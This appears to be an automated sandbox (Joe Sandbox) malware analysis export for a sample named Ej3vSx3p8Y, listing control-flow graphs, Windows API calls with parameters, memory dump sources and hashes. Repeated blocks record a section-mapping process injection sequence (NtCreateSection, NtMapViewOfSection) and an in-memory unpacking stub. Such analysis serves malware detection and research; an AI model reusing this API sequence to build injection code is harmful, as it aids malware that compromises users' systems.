                                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                                      • Opcode ID: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
                                                                                                                                                                                      • Instruction ID: 4afb5ad6e9f78dbb0f0fc4dd380045413720c66cee1019041566b0107d6eeca4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F615E71900208FBEB209F91CC49FAF7BB8EF85B14F10412AF912BA1E5D6749901DB66
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 132 401564-4015b2 call 4011f5 142 4015b4 132->142 143 4015b7-4015bc 132->143 142->143 145 4015c2-4015d3 143->145 146 4018d7-4018df 143->146 149 4018d5 145->149 150 4015d9-401602 145->150 146->143 151 4018e4-40192f call 4011f5 146->151 149->151 150->149 159 401608-40161f NtDuplicateObject 150->159 159->149 161 401625-401649 NtCreateSection 159->161 163 4016a5-4016cb NtCreateSection 161->163 164 40164b-40166c NtMapViewOfSection 161->164 163->149 166 4016d1-4016d5 163->166 164->163 165 40166e-40168a NtMapViewOfSection 164->165 165->163 168 40168c-4016a2 165->168 166->149 169 4016db-4016fc NtMapViewOfSection 166->169 168->163 169->149 171 401702-40171e NtMapViewOfSection 169->171 171->149 174 401724 171->174 174->149 176 401724 call 401729 174->176 176->149
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447059353.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                                      • Opcode ID: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
                                                                                                                                                                                      • Instruction ID: 3c61d4fa49215657d74707620d36eaa57d50516e3f831c539a14d6838cb40392
                                                                                                                                                                                      • Opcode Fuzzy Hash: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 23513CB1900249FBEB209F91CC49FAF7BB8EF85710F14412AF911BA1E5D6749941CB24
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 217 401577-4015b2 call 4011f5 224 4015b4 217->224 225 4015b7-4015bc 217->225 224->225 227 4015c2-4015d3 225->227 228 4018d7-4018df 225->228 231 4018d5 227->231 232 4015d9-401602 227->232 228->225 233 4018e4-40192f call 4011f5 228->233 231->233 232->231 241 401608-40161f NtDuplicateObject 232->241 241->231 243 401625-401649 NtCreateSection 241->243 245 4016a5-4016cb NtCreateSection 243->245 246 40164b-40166c NtMapViewOfSection 243->246 245->231 248 4016d1-4016d5 245->248 246->245 247 40166e-40168a NtMapViewOfSection 246->247 247->245 250 40168c-4016a2 247->250 248->231 251 4016db-4016fc NtMapViewOfSection 248->251 250->245 251->231 253 401702-40171e NtMapViewOfSection 251->253 253->231 256 401724 253->256 256->231 258 401724 call 401729 256->258 258->231
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447059353.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                                      • Opcode ID: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
                                                                                                                                                                                      • Instruction ID: ba3189e89dbc592d8eefb072767128172b6b3105eb2a85c49d1307986ab5c8dd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D511B71900249BFEB209F91CC48FAF7BB8FF85B14F10412AFA11BA1E5D6749941CB24
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 177 401523-401527 178 401529-40152e 177->178 179 40159f-4015b2 call 4011f5 177->179 178->179 182 4015b4 179->182 183 4015b7-4015bc 179->183 182->183 185 4015c2-4015d3 183->185 186 4018d7-4018df 183->186 189 4018d5 185->189 190 4015d9-401602 185->190 186->183 191 4018e4-40192f call 4011f5 186->191 189->191 190->189 199 401608-40161f NtDuplicateObject 190->199 199->189 201 401625-401649 NtCreateSection 199->201 203 4016a5-4016cb NtCreateSection 201->203 204 40164b-40166c NtMapViewOfSection 201->204 203->189 206 4016d1-4016d5 203->206 204->203 205 40166e-40168a NtMapViewOfSection 204->205 205->203 208 40168c-4016a2 205->208 206->189 209 4016db-4016fc NtMapViewOfSection 206->209 208->203 209->189 211 401702-40171e NtMapViewOfSection 209->211 211->189 214 401724 211->214 214->189 216 401724 call 401729 214->216 216->189
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447059353.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Section$View$CreateDuplicateObject
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3617974760-0
                                                                                                                                                                                      • Opcode ID: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
                                                                                                                                                                                      • Instruction ID: c9dca56e4daa214b2bd9150ebf0f157daf6c833c296841cdcd3f7df5e4c146b1
                                                                                                                                                                                      • Opcode Fuzzy Hash: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
                                                                                                                                                                                      • Instruction Fuzzy Hash: 91510A71900249BFEB209F92CC48F9FBBB8FF85B14F14411AFA11BA2A5D7749945CB24
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 259 40158c-4015b2 call 4011f5 263 4015b4 259->263 264 4015b7-4015bc 259->264 263->264 266 4015c2-4015d3 264->266 267 4018d7-4018df 264->267 270 4018d5 266->270 271 4015d9-401602 266->271 267->264 272 4018e4-40192f call 4011f5 267->272 270->272 271->270 280 401608-40161f NtDuplicateObject 271->280 280->270 282 401625-401649 NtCreateSection 280->282 284 4016a5-4016cb NtCreateSection 282->284 285 40164b-40166c NtMapViewOfSection 282->285 284->270 287 4016d1-4016d5 284->287 285->284 286 40166e-40168a NtMapViewOfSection 285->286 286->284 289 40168c-4016a2 286->289 287->270 290 4016db-4016fc NtMapViewOfSection 287->290 289->284 290->270 292 401702-40171e NtMapViewOfSection 290->292 292->270 295 401724 292->295 295->270 297 401724 call 401729 295->297 297->270
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447059353.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                                      • Opcode ID: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
                                                                                                                                                                                      • Instruction ID: 02d2e3ac3767ea31e924919402f7a0ff100aaf9667a8aefd77e34752db93229b
                                                                                                                                                                                      • Opcode Fuzzy Hash: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
                                                                                                                                                                                      • Instruction Fuzzy Hash: C9513AB1900249BFEB209F92CC48F9FBBB8FF85B14F10415AFA11AA1E5D7749944CB20
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 298 401585-4015b2 call 4011f5 305 4015b4 298->305 306 4015b7-4015bc 298->306 305->306 308 4015c2-4015d3 306->308 309 4018d7-4018df 306->309 312 4018d5 308->312 313 4015d9-401602 308->313 309->306 314 4018e4-40192f call 4011f5 309->314 312->314 313->312 322 401608-40161f NtDuplicateObject 313->322 322->312 324 401625-401649 NtCreateSection 322->324 326 4016a5-4016cb NtCreateSection 324->326 327 40164b-40166c NtMapViewOfSection 324->327 326->312 329 4016d1-4016d5 326->329 327->326 328 40166e-40168a NtMapViewOfSection 327->328 328->326 331 40168c-4016a2 328->331 329->312 332 4016db-4016fc NtMapViewOfSection 329->332 331->326 332->312 334 401702-40171e NtMapViewOfSection 332->334 334->312 337 401724 334->337 337->312 339 401724 call 401729 337->339 339->312
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447059353.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                                      • Opcode ID: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
                                                                                                                                                                                      • Instruction ID: 9d9f292dd7e40d4d2d6115b75542e29ae97a3c703512c5fffb38717ec82669a3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
                                                                                                                                                                                      • Instruction Fuzzy Hash: 36511A75900249BFEB209F91CC48FAF7BB8FF85B14F10416AFA11BA1A5D6749941CB24
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 340 40159a-4015b2 call 4011f5 344 4015b4 340->344 345 4015b7-4015bc 340->345 344->345 347 4015c2-4015d3 345->347 348 4018d7-4018df 345->348 351 4018d5 347->351 352 4015d9-401602 347->352 348->345 353 4018e4-40192f call 4011f5 348->353 351->353 352->351 361 401608-40161f NtDuplicateObject 352->361 361->351 363 401625-401649 NtCreateSection 361->363 365 4016a5-4016cb NtCreateSection 363->365 366 40164b-40166c NtMapViewOfSection 363->366 365->351 368 4016d1-4016d5 365->368 366->365 367 40166e-40168a NtMapViewOfSection 366->367 367->365 370 40168c-4016a2 367->370 368->351 371 4016db-4016fc NtMapViewOfSection 368->371 370->365 371->351 373 401702-40171e NtMapViewOfSection 371->373 373->351 376 401724 373->376 376->351 378 401724 call 401729 376->378 378->351
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447059353.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                                      • Opcode ID: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
                                                                                                                                                                                      • Instruction ID: 1cd82c906aaffff485458f801d6ba595cb0416390f7e33d4f9d681d8d529f326
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
                                                                                                                                                                                      • Instruction Fuzzy Hash: BF510971900249BFEB209F92CC48F9FBBB8FF85B14F104159FA11AA2A5D6749940CB24
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 379 401749-40174c 381 4018d5-40192f call 4011f5 379->381 382 4016db-4016fc NtMapViewOfSection 379->382 382->381 383 401702-40171e NtMapViewOfSection 382->383 383->381 385 401724 383->385 385->381 388 401724 call 401729 385->388 388->381
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447059353.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: SectionView
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1323581903-0
                                                                                                                                                                                      • Opcode ID: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
                                                                                                                                                                                      • Instruction ID: 088a864a315bec2a81033f27f4cad91d314b4a72151043dcf738e9c9ac7e5ebb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E011475500288FEEB219F92CC49FAF7FB9EF82B10F08016AF510B61E5E2714980CB20
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 0 2d8003c-2d80047 1 2d80049 0->1 2 2d8004c-2d80263 call 2d80a3f call 2d80e0f call 2d80d90 VirtualAlloc 0->2 1->2 17 2d8028b-2d80292 2->17 18 2d80265-2d80289 call 2d80a69 2->18 20 2d802a1-2d802b0 17->20 22 2d802ce-2d803c2 VirtualProtect call 2d80cce call 2d80ce7 18->22 20->22 23 2d802b2-2d802cc 20->23 29 2d803d1-2d803e0 22->29 23->20 30 2d80439-2d804b8 VirtualFree 29->30 31 2d803e2-2d80437 call 2d80ce7 29->31 33 2d804be-2d804cd 30->33 34 2d805f4-2d805fe 30->34 31->29 36 2d804d3-2d804dd 33->36 37 2d8077f-2d80789 34->37 38 2d80604-2d8060d 34->38 36->34 41 2d804e3-2d80505 36->41 42 2d8078b-2d807a3 37->42 43 2d807a6-2d807b0 37->43 38->37 39 2d80613-2d80637 38->39 44 2d8063e-2d80648 39->44 54 2d80517-2d80520 41->54 55 2d80507-2d80515 41->55 42->43 45 2d8086e-2d808be LoadLibraryA 43->45 46 2d807b6-2d807cb 43->46 44->37 48 2d8064e-2d8065a 44->48 53 2d808c7-2d808f9 45->53 47 2d807d2-2d807d5 46->47 50 2d80824-2d80833 47->50 51 2d807d7-2d807e0 47->51 48->37 52 2d80660-2d8066a 48->52 60 2d80839-2d8083c 50->60 57 2d807e2 51->57 58 2d807e4-2d80822 51->58 59 2d8067a-2d80689 52->59 61 2d808fb-2d80901 53->61 62 2d80902-2d8091d 53->62 56 2d80526-2d80547 54->56 55->56 63 2d8054d-2d80550 56->63 57->50 58->47 64 2d8068f-2d806b2 59->64 65 2d80750-2d8077a 59->65 60->45 66 2d8083e-2d80847 60->66 61->62 68 2d805e0-2d805ef 63->68 69 2d80556-2d8056b 63->69 70 2d806ef-2d806fc 64->70 71 2d806b4-2d806ed 64->71 65->44 72 2d80849 66->72 73 2d8084b-2d8086c 66->73 68->36 74 2d8056d 69->74 75 2d8056f-2d8057a 69->75 76 2d8074b 70->76 77 2d806fe-2d80748 70->77 71->70 72->45 73->60 74->68 78 2d8059b-2d805bb 75->78 79 2d8057c-2d80599 75->79 76->59 77->76 84 2d805bd-2d805db 78->84 79->84 84->63
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02D8024D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447763126.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d80000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID: cess$kernel32.dll
                                                                                                                                                                                      • API String ID: 4275171209-1230238691
                                                                                                                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                      • Instruction ID: a3dcd30f86fae6a66a967e8b9b219d76427dd2864350c8a661673b37e68e1691
                                                                                                                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B526875A01229DFDB64DF58C984BA8BBB1BF09305F1480D9E94DAB351DB30AE89CF14
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 398 2d80e0f-2d80e24 SetErrorMode * 2 399 2d80e2b-2d80e2c 398->399 400 2d80e26 398->400 400->399
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,02D80223,?,?), ref: 02D80E19
                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,02D80223,?,?), ref: 02D80E1E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447763126.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d80000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                      • Instruction ID: e137e78b578b6a5f483533a7db217aef9f66ea24294c700cfcf316ed3c75de30
                                                                                                                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                      • Instruction Fuzzy Hash: C2D0123214512877D7013A94DC09BCE7B1CDF05B67F008011FB0DD9180C770994046E5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 401 40a50e-40a51d 403 40a523-40a526 401->403 404 40a51f-40a522 401->404 405 40a536-40a53f call 40b49d 403->405 406 40a528-40a52d 403->406 409 40a544-40a549 405->409 406->406 407 40a52f-40a534 406->407 407->405 407->406 410 40a558-40a563 call 40cbc0 409->410 411 40a54b-40a557 409->411 410->411
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447086890.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_409000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __malloc_crt
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3464615804-0
                                                                                                                                                                                      • Opcode ID: f716473c93f40e08b8f17fa16b8105f566405770d4ce6ab3c18bf3b7c72c6e6d
                                                                                                                                                                                      • Instruction ID: b8c2a432e31bf78347983678b32f112fceb90469223e239fed1b50043222156e
                                                                                                                                                                                      • Opcode Fuzzy Hash: f716473c93f40e08b8f17fa16b8105f566405770d4ce6ab3c18bf3b7c72c6e6d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 86F0A7375152207ECA257B797C484771668FACB36E312443BF5A2E3280F6384D5383AA
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 415 40a7bf-40a7e1 HeapCreate 416 40a7e3-40a7e4 415->416 417 40a7e5-40a7ee 415->417
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040A7D4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447086890.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_409000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                                                      • Opcode ID: 6a82aa968daa5495f3ff2c2cc8af4882126a351b6f54e52bac91e249469a30a0
                                                                                                                                                                                      • Instruction ID: d3e0cb925658e61feea0fbeb3300cec5ab914627d53ba74c5b8b9f6250990994
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a82aa968daa5495f3ff2c2cc8af4882126a351b6f54e52bac91e249469a30a0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 94D0A732A903095FEB109FB17D097263BECD388799F04443AB90CC6190FA74C961D544
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 418 401932-40197e 426 401981-4019a3 call 4011f5 Sleep call 401467 418->426 427 40196f-40197a 418->427 432 4019b2-4019f7 call 4011f5 426->432 433 4019a5-4019ad call 401558 426->433 427->426 433->432
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E
